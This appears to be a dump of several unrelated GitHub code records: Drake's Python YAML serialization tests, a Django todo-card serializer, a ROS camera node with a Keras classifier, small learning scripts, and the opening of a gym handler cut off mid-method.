# - VisitScalarFoundNothing\n # - VisitScalarFoundArray\n # - VisitScalarFoundStruct\n # - VisitArrayFoundNothing\n # - VisitArrayFoundScalar\n # - VisitArrayFoundStruct\n # - VisitVectorFoundNothing\n # - VisitVectorFoundScalar\n # - VisitVectorFoundStruct\n # - VisitOptionalScalarFoundSequence\n # - VisitEigenFoundNothing\n # - VisitEigenFoundScalar\n # - VisitEigenMatrixFoundOneDimensional\n # - VisitEigenMatrixFoundNonSquare\n # - 
VisitStructFoundNothing\n # - VisitStructFoundScalar\n # - VisitStructFoundArray\n\n\nclass TestYamlTypedReadAcceptance(unittest.TestCase):\n \"\"\"Acceptance tests for the typed yaml_load function(s).\n\n This test class is the Python flavor of the C++ test suite at\n drake/common/yaml/test/yaml_io_test.cc\n and should be roughly kept in sync with the test cases in that file.\n \"\"\"\n\n def test_load_string(self):\n data = dedent(\"\"\"\n value:\n some_value\n \"\"\")\n result = yaml_load_typed(schema=StringStruct, data=data)\n self.assertEqual(result.value, \"some_value\")\n\n def test_load_string_child_name(self):\n data = dedent(\"\"\"\n some_child_name:\n value:\n some_value\n \"\"\")\n result = yaml_load_typed(schema=StringStruct, data=data,\n child_name=\"some_child_name\")\n self.assertEqual(result.value, \"some_value\")\n\n # When the requested child_name does not exist, that's an error.\n with self.assertRaisesRegex(KeyError, \"wrong_child_name\"):\n yaml_load_typed(schema=StringStruct, data=data,\n child_name=\"wrong_child_name\")\n\n def test_load_string_defaults(self):\n data = dedent(\"\"\"\n value:\n some_key: 1.0\n \"\"\")\n defaults = MapStruct()\n\n # Merge the default map value(s).\n result = yaml_load_typed(\n schema=MapStruct, data=data, defaults=defaults)\n self.assertDictEqual(result.value, dict(\n nominal_float=nan,\n some_key=1.0))\n\n # Replace the default map value(s).\n result = yaml_load_typed(\n schema=MapStruct, data=data, defaults=defaults,\n retain_map_defaults=False)\n self.assertDictEqual(result.value, dict(some_key=1.0))\n\n def test_load_string_options(self):\n data = dedent(\"\"\"\n value: some_value\n extra_junk: will_be_ignored\n \"\"\")\n result = yaml_load_typed(schema=StringStruct, data=data,\n allow_yaml_with_no_schema=True)\n self.assertEqual(result.value, \"some_value\")\n\n # Cross-check that the option actually was important.\n with self.assertRaisesRegex(RuntimeError, \".*extra_junk.*\"):\n yaml_load_typed(schema=StringStruct, data=data)\n\n def test_load_file(self):\n filename = FindResourceOrThrow(\n \"drake/common/yaml/test/yaml_io_test_input_1.yaml\")\n result = yaml_load_typed(schema=StringStruct, filename=filename)\n self.assertEqual(result.value, \"some_value_1\")\n\n def test_read_bad_schema(self):\n # N.B. 
This test covers python-specific error handling, so does not\n # have any corrresponding cases in the C++ unit tests.\n with self.assertRaisesRegex(Exception, \"should have been a dict\"):\n yaml_load_typed(\n schema=typing.List[float], data=\"[1.0]\", defaults=[])\n\n\nclass TestYamlTypedWrite(unittest.TestCase):\n \"\"\"Detailed tests for the yaml_dump_typed function.\n\n This test class is the Python flavor of the C++ test suite at\n drake/common/yaml/test/yaml_write_archive_test.cc\n and should be roughly kept in sync with the test cases in that file.\n \"\"\"\n\n def test_write_float(self):\n cases = [\n (0.0, \"0.0\"),\n (1.0, \"1.0\"),\n (-1.0, \"-1.0\"),\n (0.009, \"0.009\"),\n (1.2, \"1.2\"),\n (-1.2, \"-1.2\"),\n (5.6e+16, \"5.6e+16\"),\n (5.6e-12, \"5.6e-12\"),\n (-5.6e+16, \"-5.6e+16\"),\n (-5.6e-12, \"-5.6e-12\"),\n # See https://yaml.org/spec/1.2.2/#10214-floating-point.\n (nan, \".nan\"),\n (inf, \".inf\"),\n (-inf, \"-.inf\"),\n ]\n for value, expected_str in cases:\n actual_doc = yaml_dump_typed(FloatStruct(value=value))\n expected_doc = f\"value: {expected_str}\\n\"\n self.assertEqual(actual_doc, expected_doc)\n\n def test_write_string(self):\n cases = [\n (\"a\", \"a\"),\n (\"1\", \"'1'\"),\n ]\n for value, expected_str in cases:\n actual_doc = yaml_dump_typed(StringStruct(value=value))\n expected_doc = f\"value: {expected_str}\\n\"\n self.assertEqual(actual_doc, expected_doc)\n\n def test_write_list_plain(self):\n # When the vector items are simple YAML scalars, we should use \"flow\"\n # style, where they all appear on a single line.\n cases = [\n ([], \"value: []\\n\"),\n ([1.0, 2.0, 3.0], \"value: [1.0, 2.0, 3.0]\\n\"),\n ]\n for value, expected_doc in cases:\n actual_doc = yaml_dump_typed(ListStruct(value=value))\n self.assertEqual(actual_doc, expected_doc)\n\n def test_write_list_nested(self):\n # When the vector items are not simple scalars, we should use \"block\"\n # style, where each gets its own line(s).\n cases = [\n (\n [FloatStruct(value=1.0), FloatStruct(value=2.0)],\n dedent(\"\"\"\\\n value:\n - !FloatStruct\n value: 1.0\n - !FloatStruct\n value: 2.0\n \"\"\"),\n ),\n # Empty lists still use flow style.\n (\n [],\n dedent(\"\"\"\\\n value: []\n \"\"\"),\n ),\n ]\n for value, expected_doc in cases:\n actual_doc = yaml_dump_typed(ListVariantStruct(value=value))\n self.assertEqual(actual_doc, expected_doc)\n\n def test_write_map(self):\n cases = [\n (\n dict(),\n dedent(\"\"\"\\\n value: {}\n \"\"\"),\n ),\n (\n dict(foo=0.0),\n dedent(\"\"\"\\\n value:\n foo: 0.0\n \"\"\"),\n ),\n (\n dict(foo=0.0, bar=1.0),\n dedent(\"\"\"\\\n value:\n bar: 1.0\n foo: 0.0\n \"\"\"),\n ),\n ]\n for value, expected_doc in cases:\n actual_doc = yaml_dump_typed(MapStruct(value=value))\n self.assertEqual(actual_doc, expected_doc)\n\n def test_write_bad_map_key(self):\n @dc.dataclass\n class BadMapStruct:\n value: typing.Dict[int, float]\n with self.assertRaisesRegex(Exception, \"keys must be string\"):\n yaml_dump_typed(BadMapStruct({1: 2}))\n\n def test_write_map_directly(self):\n cases = [\n (\n dict(),\n dedent(\"\"\"\\\n {}\n \"\"\"),\n ),\n (\n dict(foo=0.0),\n dedent(\"\"\"\\\n foo: 0.0\n \"\"\"),\n ),\n (\n dict(foo=0.0, bar=1.0),\n dedent(\"\"\"\\\n bar: 1.0\n foo: 0.0\n \"\"\"),\n ),\n ]\n schema = typing.Dict[str, float]\n for value, expected_doc in cases:\n actual_doc = yaml_dump_typed(value, schema=schema)\n self.assertEqual(actual_doc, expected_doc)\n\n def test_write_optional(self):\n cases = [\n (1.0, \"value: 1.0\\n\"),\n (None, \"{}\\n\"),\n ]\n for value, 
expected_doc in cases:\n actual_doc = yaml_dump_typed(OptionalStruct(value=value))\n self.assertEqual(actual_doc, expected_doc)\n\n def test_write_variant(self):\n cases = [\n (\n \"\",\n \"value: ''\\n\",\n ),\n (\n \"foo\",\n \"value: foo\\n\",\n ),\n (\n FloatStruct(1.0),\n dedent(\"\"\"\\\n value: !FloatStruct\n value: 1.0\n \"\"\"),\n ),\n (\n NumpyStruct(np.array([1.0, 2.0])),\n dedent(\"\"\"\\\n value: !NumpyStruct\n value: [1.0, 2.0]\n \"\"\"),\n ),\n ]\n for value, expected_doc in cases:\n actual_doc = yaml_dump_typed(VariantStruct(value=value))\n self.assertEqual(actual_doc, expected_doc)\n\n # TODO(jwnimmer-tri) We'd like to see \"!!float 1.0\" here, but our\n # dumper does not yet support that output syntax.\n with self.assertRaisesRegex(Exception, \"float.*non-zero index\"):\n yaml_dump_typed(VariantStruct(value=1.0))\n\n # Check when the value in a Union is not one of the allowed types.\n with self.assertRaisesRegex(Exception, \"did not match\"):\n yaml_dump_typed(VariantStruct(value=MapStruct()))\n with self.assertRaisesRegex(Exception, \"does not allow None\"):\n yaml_dump_typed(VariantStruct(value=None))\n\n def test_write_nullable_variant(self):\n cases = [\n (\n None,\n \"value: null\\n\",\n ),\n (\n FloatStruct(1.0),\n dedent(\"\"\"\\\n value: !FloatStruct\n value: 1.0\n \"\"\"),\n ),\n ]\n for value, expected_doc in cases:\n actual_doc = yaml_dump_typed(NullableVariantStruct(value=value))\n self.assertEqual(actual_doc, expected_doc)\n\n def test_write_numpy_vector(self):\n cases = [\n ([], \"value: []\\n\"),\n ([1.0], \"value: [1.0]\\n\"),\n ([1.0, 0.0], \"value: [1.0, 0.0]\\n\"),\n ]\n for value, expected_doc in cases:\n actual_doc = yaml_dump_typed(NumpyStruct(value=np.array(value)))\n self.assertEqual(actual_doc, expected_doc)\n\n def test_write_numpy_matrix(self):\n x = NumpyStruct(value=np.array([\n [0.0, 1.0, 2.0, 3.0],\n [4.0, 5.0, 6.0, 7.0],\n [8.0, 9.0, 10.0, 11.0],\n ]))\n self.assertEqual(yaml_dump_typed(x), dedent(\"\"\"\\\n value:\n - [0.0, 1.0, 2.0, 3.0]\n - [4.0, 5.0, 6.0, 7.0]\n - [8.0, 9.0, 10.0, 11.0]\n \"\"\"))\n\n def test_write_numpy_matrix00(self):\n x = NumpyStruct(value=np.ndarray(shape=(0, 0)))\n self.assertEqual(yaml_dump_typed(x), dedent(\"\"\"\\\n value: []\n \"\"\"))\n\n def test_write_nested(self):\n x = OuterStruct()\n x.outer_value = 1.0\n x.inner_struct.inner_value = 2.0\n\n saved = yaml_dump_typed(x, child_name=\"doc\")\n expected = dedent(\"\"\"\\\n doc:\n outer_value: 1.0\n inner_struct:\n inner_value: 2.0\n \"\"\")\n self.assertEqual(saved, expected)\n\n def test_write_blank_inner(self):\n x = OuterWithBlankInner()\n x.outer_value = 1.0\n\n saved = yaml_dump_typed(x, child_name=\"doc\")\n expected = dedent(\"\"\"\\\n doc:\n outer_value: 1.0\n inner_struct: {}\n \"\"\")\n self.assertEqual(saved, expected)\n\n def test_write_child_name(self):\n x = FloatStruct(value=1.0)\n dut = functools.partial(yaml_dump_typed, data=x)\n self.assertEqual(dut(child_name=None), \"value: 1.0\\n\")\n self.assertEqual(dut(child_name=\"root\"), \"root:\\n value: 1.0\\n\")\n with self.assertRaisesRegex(Exception, \"child_name must be a prim\"):\n dut(child_name=[1, 2, 3])\n\n\nclass TestYamlTypedWriteDefaults(unittest.TestCase):\n \"\"\"Detailed tests for the yaml_dump_typed use of ``defaults=...``, in\n particular the _erase_matching_maps function.\n\n This test class is the Python flavor of the C++ test suite at\n drake/common/yaml/test/yaml_write_archive_defaults_test.cc\n and should be roughly kept in sync with the test cases in that file.\n \"\"\"\n\n 
def _save(self, data, defaults, child_name=\"doc\"):\n return yaml_dump_typed(\n data=data,\n defaults=defaults,\n child_name=child_name)\n\n def test_dump_default_basic_example1(self):\n # Shows the typical use -- that only the novel data is output.\n # The inner_struct is the same for both x and y, so is not output.\n defaults = OuterStruct()\n defaults.outer_value = 1.0\n defaults.inner_struct.inner_value = 2.0\n data = copy.deepcopy(defaults)\n data.outer_value = 3.0\n self.assertEqual(self._save(data, defaults), dedent(\"\"\"\\\n doc:\n outer_value: 3.0\n \"\"\"))\n\n def test_dump_default_basic_example2(self):\n # Shows the typical use -- that only the novel data is output.\n # The outer_value is the same for both x and y, so is not output.\n defaults = OuterStruct()\n defaults.outer_value = 1.0\n defaults.inner_struct.inner_value = 2.0\n data = copy.deepcopy(defaults)\n data.inner_struct.inner_value = 3.0\n self.assertEqual(self._save(data, defaults), dedent(\"\"\"\\\n doc:\n inner_struct:\n inner_value: 3.0\n \"\"\"))\n\n def test_dump_default_basic_example3(self):\n # Shows the typical use -- emit the content with or without providing a\n # root_name.\n defaults = OuterStruct()\n defaults.outer_value = 1.0\n data = OuterStruct()\n data.outer_value = 3.0\n data.inner_struct.inner_value = defaults.inner_struct.inner_value\n\n # Emit using the default \"doc\" root name.\n self.assertEqual(self._save(data, defaults), dedent(\"\"\"\\\n doc:\n outer_value: 3.0\n \"\"\"))\n\n # Emit using an empty root name.\n self.assertEqual(self._save(data, defaults, None), dedent(\"\"\"\\\n outer_value: 3.0\n \"\"\"))\n\n # Emit with an empty root name without defaults.\n self.assertEqual(self._save(defaults, defaults, None), dedent(\"\"\"\\\n {}\n \"\"\"))\n\n def test_dump_default_different_map_order1(self):\n # Same as the BasicExample1 from above, except that the map order of\n # the defaults vs data differs. The defaults still take effect.\n defaults = OuterStructOpposite()\n defaults.inner_struct.inner_value = 1.0\n defaults.outer_value = 2.0\n data = OuterStruct()\n data.outer_value = 3.0\n data.inner_struct.inner_value = defaults.inner_struct.inner_value\n\n self.assertEqual(self._save(data, defaults), dedent(\"\"\"\\\n doc:\n outer_value: 3.0\n \"\"\"))\n\n def test_dump_default_different_map_order2(self):\n # Same as the BasicExample2 from above, except that the map order of\n # the defaults vs data differs. 
The defaults still take effect.\n defaults = OuterStructOpposite()\n defaults.inner_struct.inner_value = 1.0\n defaults.outer_value = 2.0\n data = OuterStruct()\n data.outer_value = defaults.outer_value\n data.inner_struct.inner_value = 3.0\n\n self.assertEqual(self._save(data, defaults), dedent(\"\"\"\\\n doc:\n inner_struct:\n inner_value: 3.0\n \"\"\"))\n\n def test_dump_default_nulls(self):\n # YAML nulls are handled reasonably, without throwing.\n defaults = OptionalStruct()\n defaults.value = None\n data = copy.deepcopy(defaults)\n\n self.assertEqual(self._save(data, defaults), dedent(\"\"\"\\\n doc: {}\n \"\"\"))\n\n def test_dump_default_different_lists(self):\n # Lists differing in their values are not erased.\n defaults = ListStruct()\n defaults.value = [0.0, 0.0, 0.0]\n data = ListStruct()\n data.value = [1.0, 2.0, 3.0]\n\n self.assertEqual(self._save(data, defaults), dedent(\"\"\"\\\n doc:\n value: [1.0, 2.0, 3.0]\n \"\"\"))\n\n def test_dump_default_different_size_lists(self):\n # Lists differing in size (but sharing a prefix) are not erased.\n defaults = ListStruct()\n defaults.value = [1.0, 2.0]\n data = ListStruct()\n data.value = [1.0, 2.0, 3.0]\n\n self.assertEqual(self._save(data, defaults), dedent(\"\"\"\\\n doc:\n value: [1.0, 2.0, 3.0]\n \"\"\"))\n\n def test_dump_default_different_variant_tag(self):\n # Variants differing by tag are not erased.\n defaults = VariantStruct()\n defaults.value = NumpyStruct()\n data = VariantStruct()\n data.value = FloatStruct(1.0)\n\n self.assertEqual(self._save(data, defaults), dedent(\"\"\"\\\n doc:\n value: !FloatStruct\n value: 1.0\n \"\"\"))\n\n def test_dump_default_different_map_keys(self):\n # Maps differing in key only (same value) are not erased.\n defaults = MapStruct()\n defaults.value[\"b\"] = 1.0\n data = MapStruct()\n data.value[\"a\"] = 1.0\n\n self.assertEqual(self._save(data, defaults), dedent(\"\"\"\\\n doc:\n value:\n a: 1.0\n \"\"\"))\n\n def test_dump_default_different_map_values(self):\n # Maps differing in value only (same key) are not erased.\n defaults = MapStruct()\n defaults.value[\"a\"] = 2.0\n data = MapStruct()\n data.value[\"a\"] = 1.0\n\n self.assertEqual(self._save(data, defaults), dedent(\"\"\"\\\n doc:\n value:\n a: 1.0\n \"\"\"))\n\n\nclass TestYamlTypedWriteAcceptance(unittest.TestCase):\n \"\"\"Acceptance tests for the typed yaml_load function(s).\n\n This test class is the Python flavor of the C++ test suite at\n drake/common/yaml/test/yaml_io_test.cc\n and should be roughly kept in sync with the test cases in that file.\n \"\"\"\n\n def test_save_string(self):\n data = StringStruct(value=\"save_string\")\n result = yaml_dump_typed(data)\n self.assertEqual(result, \"value: save_string\\n\")\n\n def test_save_string_child(self):\n child_name = \"some_child\"\n data = StringStruct(value=\"save_string_child\")\n result = yaml_dump_typed(data, child_name=child_name)\n self.assertEqual(result, \"some_child:\\n value: save_string_child\\n\")\n\n def test_save_string_defaults(self):\n # N.B. 
The MapStruct.value dict contains a \"nominal_float\" by default.\n defaults = MapStruct()\n data = MapStruct()\n data.value[\"save_string\"] = 1.0\n assert len(data.value) == 2\n\n # Only the non-default map entry is saved.\n result = yaml_dump_typed(data, defaults=defaults)\n self.assertEqual(result, dedent(\"\"\"\\\n value:\n save_string: 1.0\n \"\"\"))\n\n # Inside the implementation of yaml_dump_typed, the code to save to a\n # string versus a file shares all of the same dumping logic; only at the\n # last moment do we choose to write the output to a string or a file.\n # Therefore, we don't need to repeat all of the schema-specific test cases\n # for files. Instead, we can just spot-check a few calls to probe the file\n # handling and argument passing.\n\n def test_save_file(self):\n filename = Path(os.environ[\"TEST_TMPDIR\"]) / \"save_file.yaml\"\n data = StringStruct(value=\"save_file\")\n yaml_dump_typed(filename=filename, data=data)\n readback = filename.read_text(encoding=\"utf-8\")\n self.assertEqual(readback, \"value: save_file\\n\")\n\n def test_save_file_all_args(self):\n # N.B. The MapStruct.value dict contains a \"nominal_float\" by default.\n defaults = MapStruct()\n data = MapStruct()\n data.value[\"save_file\"] = 1.0\n assert len(data.value) == 2\n\n filename = Path(os.environ[\"TEST_TMPDIR\"]) / \"save_file_all_args.yaml\"\n yaml_dump_typed(\n filename=filename,\n data=data,\n child_name=\"some_child\",\n defaults=defaults,\n )\n readback = filename.read_text(encoding=\"utf-8\")\n self.assertEqual(readback, dedent(\"\"\"\\\n some_child:\n value:\n save_file: 1.0\n \"\"\"))\n\n def test_write_bad_schema(self):\n # N.B. This test covers python-specific error handling, so does not\n # have any corresponding cases in the C++ unit tests.\n with self.assertRaisesRegex(Exception, \"should have been a dict\"):\n yaml_dump_typed([1.0], schema=typing.List[float])\n\n\nclass TestYamlTypedReadPybind11(unittest.TestCase):\n \"\"\"Tests for (de)serializing into pybind11 objects.\"\"\"\n\n def test_missing_serialize_binding(self):\n # For testing the error message in case of missing C++ bindings, we\n # just need any bound C++ class that doesn't have a Serialize().\n # We'll use Value to avoid dependencies on non-'common' code.\n invalid_cxx_class = Value[str]\n with self.assertRaisesRegex(RuntimeError, \".*lacks.*__fields__.*\"):\n yaml_dump_typed(invalid_cxx_class())\n with self.assertRaisesRegex(RuntimeError, \".*lacks.*__fields__.*\"):\n yaml_load_typed(schema=invalid_cxx_class, data=\"{}\")\n\n def test_mydata2(self):\n data = dedent(\"\"\"\\\n some_bool: true\n some_int: 1\n some_uint64: 1\n some_float: 1.0\n some_double: 1.0\n some_string: one\n some_eigen:\n - [1.0]\n some_optional: 1.0\n some_vector: [1.0]\n some_map:\n one: 1.0\n some_variant: !MyData1\n quux: 1.0\n \"\"\")\n x = yaml_load_typed(schema=MyData2, data=data)\n self.assertEqual(x.some_bool, True)\n self.assertEqual(x.some_int, 1)\n self.assertEqual(x.some_uint64, 1)\n self.assertEqual(x.some_float, 1.0)\n self.assertEqual(x.some_double, 1.0)\n self.assertEqual(x.some_string, \"one\")\n self.assertEqual(x.some_eigen, [1.0])\n self.assertEqual(x.some_optional, 1.0)\n self.assertEqual(x.some_vector, [1.0])\n self.assertEqual(x.some_map, dict(one=1.0))\n self.assertEqual(x.some_variant.quux, 1.0)\n self.assertEqual(yaml_dump_typed(x), 
data)\n","repo_name":"mwoehlke-kitware/drake","sub_path":"bindings/pydrake/common/test/yaml_typed_test.py","file_name":"yaml_typed_test.py","file_ext":"py","file_size_in_byte":41521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"25457061702","text":"\r\nfrom collections import Counter\r\n\r\ndef descomponer(n):\r\n primos = []\r\n\r\n for i in range(2, n + 1):\r\n while n % i == 0:\r\n primos.append(i)\r\n n = n // i\r\n\r\n c = Counter(primos)\r\n for i in range(len(primos)):\r\n print(primos[i])\r\n\r\n\r\ndescomponer(20)","repo_name":"aldebarran22/curso_santander_avanzado","sub_path":"codigo_mar_23/pruebas.py","file_name":"pruebas.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"74321509354","text":"my_dog = { 'name': 'Ted', 'age': 15, 'breed': 'Border Collie'}\n# Key value pairs. 'name' is key - 'Ted' is value.\n# dict.items() yields (key, value) pairs; each pair is a tuple, an immutable sequence.\n\nmy_dog['age'] = 16\n# Can change values\nmy_dog['owner'] = 'Matt'\n# Can add keys\n\n# print(my_dog.items())\n# Gives tuples\n\n# for k, v in my_dog.items():\n# print(f'The value of \"{k}\" is {v}')\n\n# print(item) Gives keys, my_dog[item] gives values\n\nprint(my_dog.get('stage', 'Unknown'))\n\n# the .get method returns the default (or None) rather than raising an error. ","repo_name":"ValK-98/ca2023","sub_path":"python/data-structures/dicts.py","file_name":"dicts.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38122364400","text":"from rest_framework import serializers\nfrom core.models import (\n TodoCard,\n UserTodo,\n)\nfrom drf_spectacular.utils import (\n extend_schema_serializer,\n OpenApiExample,\n)\nfrom app_todo.utils import (\n separate_to_tasks_by_color_from_serialize_data,\n)\n\n\n@extend_schema_serializer(\n examples=[\n OpenApiExample(\n 'response detail',\n description='',\n value={\n \"id\": 0,\n \"name\": \"swim tonight\",\n \"color\": \"HT\",\n \"description\": \"swim with Peter & Dough\",\n \"done_at\": \"2022-12-08T09:39:47.454Z\",\n },\n response_only=True, ), ])\nclass TodoCardSerializer(serializers.ModelSerializer):\n class Meta:\n model = TodoCard\n fields = [\n 'id',\n 'name',\n 'description',\n 'color',\n 'done_at']\n read_only_fields = ['id', 'done_at']\n\n def create(self, validate_data):\n user = self.context['request'].user\n user_todo, _ = UserTodo.objects.get_or_create(user=user)\n todo_card = TodoCard.objects.create(\n user_todo=user_todo,\n **validate_data)\n return todo_card\n\n def update(self, instance, validated_data):\n for attr, value in validated_data.items():\n setattr(instance, attr, value)\n\n instance.save()\n return instance\n\n\n@extend_schema_serializer(\n examples=[\n OpenApiExample(\n 'response example',\n description='',\n value={\n \"id\": 0,\n \"name\": \"swim tonight\",\n \"description\": \"swim with Peter & Dough\",\n \"color\": \"HT\",\n \"done_at\": \"2022-12-08T09:39:47.454Z\",\n \"created_at\": \"2022-12-08T09:39:47.454Z\",\n \"updated_at\": \"2022-12-08T09:39:47.454Z\"\n },\n response_only=True,),\n OpenApiExample(\n 'request example',\n description='',\n value={\n \"name\": \"swim tonight\",\n \"description\": \"swim with Peter & Dough\",\n \"color\": \"HT\",\n },\n request_only=True, ), ])\nclass TodoCardDetailSerializer(TodoCardSerializer):\n class Meta(TodoCardSerializer.Meta):\n fields = 
TodoCardSerializer.Meta.fields + ['created_at', 'updated_at']\n read_only_fields = TodoCardSerializer.Meta.read_only_fields \\\n + ['created_at', 'updated_at']\n\n\n@extend_schema_serializer(\n examples=[\n OpenApiExample(\n 'set task done',\n description='',\n value={'is_done': True},\n request_only=True,),\n OpenApiExample(\n 'set task not done yet',\n description='',\n value={'is_done': False},\n request_only=True, ), ])\nclass RequestTodoCardStatusSerializer(serializers.Serializer):\n is_done = serializers.BooleanField(required=True)\n\n\n@extend_schema_serializer(\n examples=[\n OpenApiExample(\n 'set task done',\n description='',\n value={\n 'pink_task': [{\n \"id\": 1,\n \"name\": \"some task\",\n \"description\": \"some task\",\n \"color\": \"HT\",\n \"done_at\": \"2022-12-08T10:33:12.417Z\"\n }, {\n \"id\": 2,\n \"name\": \"some task\",\n \"description\": \"some task\",\n \"color\": \"HT\",\n \"done_at\": \"2022-12-08T10:33:12.417Z\"\n }, ],\n 'orange_task': [{\n \"id\": 3,\n \"name\": \"some task\",\n \"description\": \"some task\",\n \"color\": \"H\",\n \"done_at\": \"2022-12-08T10:33:12.417Z\"\n }, {\n \"id\": 4,\n \"name\": \"some task\",\n \"description\": \"some task\",\n \"color\": \"H\",\n \"done_at\": \"2022-12-08T10:33:12.417Z\"\n }, ],\n 'blue_task': [{\n \"id\": 5,\n \"name\": \"some task\",\n \"description\": \"some task\",\n \"color\": \"L\",\n \"done_at\": \"2022-12-08T10:33:12.417Z\"\n }, {\n \"id\": 6,\n \"name\": \"some task\",\n \"description\": \"some task\",\n \"color\": \"L\",\n \"done_at\": \"2022-12-08T10:33:12.417Z\"\n }, ],\n 'green_task': [{\n \"id\": 7,\n \"name\": \"some task\",\n \"description\": \"some task\",\n \"color\": \"LT\",\n \"done_at\": \"2022-12-08T10:33:12.417Z\"\n }, {\n \"id\": 8,\n \"name\": \"some task\",\n \"description\": \"some task\",\n \"color\": \"LT\",\n \"done_at\": \"2022-12-08T10:33:12.417Z\"\n }, ],\n },\n response_only=True, ), ])\nclass ResponseGetListByColor(serializers.Serializer):\n\n pink_task = TodoCardDetailSerializer(many=True)\n orange_task = TodoCardDetailSerializer(many=True)\n blue_task = TodoCardDetailSerializer(many=True)\n green_task = TodoCardDetailSerializer(many=True)\n\n def to_representation(self, internal_data: list[TodoCard]):\n \"\"\"\n internal_data: serialized data fetched from the database\n \"\"\"\n deserialize_data = TodoCardSerializer(\n internal_data, many=True).data\n instance = \\\n separate_to_tasks_by_color_from_serialize_data(\n deserialize_data)\n\n return instance\n","repo_name":"qitpy/django-server","sub_path":"src/app_todo/serializers/todo_card_serializer.py","file_name":"todo_card_serializer.py","file_ext":"py","file_size_in_byte":5808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34842530790","text":"import sys\nsys.stdin = open('input.txt')\n\ndef find_set(x): # return the representative of the set containing x\n while x != rep[x]:\n x = rep[x]\n return x\n\ndef union(x, y): # make y's representative point to x's representative\n rep[find_set(y)] = find_set(x)\n\nT = int(input())\n\nfor tc in range(1, T+1):\n V, E = map(int, input().split())\n rep = [i for i in range(V+1)]\n arr = [list(map(int, input().split())) for _ in range(E)]\n arr.sort(key = lambda x : x[2])\n cnt = 0\n s = 0\n for u, v, w in arr:\n if find_set(u) != find_set(v):\n cnt += 1\n s += w\n union(u, v)\n if cnt == V:\n break\n \n print(f'#{tc}', 
s)","repo_name":"AndreaStudy/PythonAlgo","sub_path":"swea/problems/MST/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35413746909","text":"import rospy\nfrom sensor_msgs.msg import Image\n\nimport cv2\nimport numpy as np\nimport tensorflow.keras\n\nfrom std_msgs.msg import Float32MultiArray\nfrom std_msgs.msg import MultiArrayDimension\n\nprint(\"Complete to open Simple_camera Node\")\n\nUSE_ML = True\n\nif(USE_ML):\n np.set_printoptions(suppress=True)\n\n model = tensorflow.keras.models.load_model('/home/racecar/catkin_ws/src/racecar_ws/src/keras_model.h5')\n data = np.ndarray(shape=(1, 224, 224, 3), dtype=np.float32)\n\ncap = cv2.VideoCapture(0)\ncap.set(cv2.CAP_PROP_FRAME_WIDTH,640)\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT,480)\n\n\nrospy.init_node('camera')\npub_im = rospy.Publisher('/camera', Image, queue_size=1)\nML_pub = rospy.Publisher('/teachable_machine', Float32MultiArray, queue_size=1)\n\nwhile not rospy.is_shutdown():\n\n _, frame = cap.read()\n\n if frame is None:\n continue\n\n msg = Image()\n msg.height = frame.shape[0]\n msg.width = frame.shape[1]\n msg.encoding = 'bgr8'\n msg.is_bigendian = 0\n msg.step = 3 * msg.width\n msg.data = frame.flatten().tobytes()\n\n pub_im.publish(msg)\n\n if(USE_ML):\n \timage_array = cv2.resize(frame, (224, 224), interpolation = cv2.INTER_AREA)\n \tnormalized_image_array = image_array.astype(np.float32)/127.0 - 1\n \tdata[0] = normalized_image_array\n \tprediction = model.predict(data)\n \t#print(prediction)\n \tprediction_data = Float32MultiArray()\n \tprediction_data.data = np.array(prediction).flatten()\n \tML_pub.publish(prediction_data)\n\n\n\n\ncap.release()\n\n","repo_name":"nulLeeKH/2020-unist-stem-camp","sub_path":"autonomous-car-challange/src/vision-control/simple_camera.py","file_name":"simple_camera.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"3502155859","text":"from typing import Dict\r\n\r\nimport gymnasium as gym\r\nimport numpy as np\r\n\r\nfrom mobile_env.handlers.handler import Handler\r\n\r\n\r\nclass MComMAHandler(Handler):\r\n features = [\r\n \"budget\",\r\n \"bundles\",\r\n \"tasks\",\r\n \"net-states\",\r\n ]\r\n\r\n @classmethod\r\n def action_space(cls, env) -> gym.spaces.Dict:\r\n sp_action_space = gym.spaces.Dict(\r\n {inp.inp_id: gym.spaces.Discrete(10001) for inp in env.inps}\r\n )\r\n return gym.spaces.Dict({sp.sp_id: sp_action_space for sp in env.sps})\r\n\r\n @classmethod\r\n def observation_space(cls, env) -> gym.spaces.Dict:\r\n bundles_space = gym.spaces.Box(\r\n low=0, high=np.inf, shape=(env.NUM_InPs, 3), dtype=np.int32\r\n )\r\n tasks_space = gym.spaces.Box(\r\n low=0, high=np.inf, shape=(env.NUM_USERS, 4), dtype=np.int32\r\n )\r\n net_states_space = gym.spaces.Box(\r\n low=0,\r\n high=np.inf,\r\n shape=(env.NUM_USERS * env.NUM_EDGE_SERVERS, 3),\r\n dtype=np.float64,\r\n )\r\n\r\n sp_space = gym.spaces.Dict(\r\n {\r\n \"budget\": gym.spaces.Box(low=0, high=np.inf, shape=(1,), dtype=np.int32),\r\n \"bundles\": bundles_space,\r\n \"tasks\": tasks_space,\r\n \"net-states\": net_states_space,\r\n }\r\n )\r\n\r\n space = {sp.sp_id: sp_space for sp in env.sps}\r\n\r\n space = gym.spaces.Dict(space)\r\n return space\r\n\r\n @classmethod\r\n def reward(cls, env):\r\n rewards = {}\r\n return rewards\r\n\r\n @classmethod\r\n def observation(cls, env) -> Dict[int, np.ndarray]:\r\n 
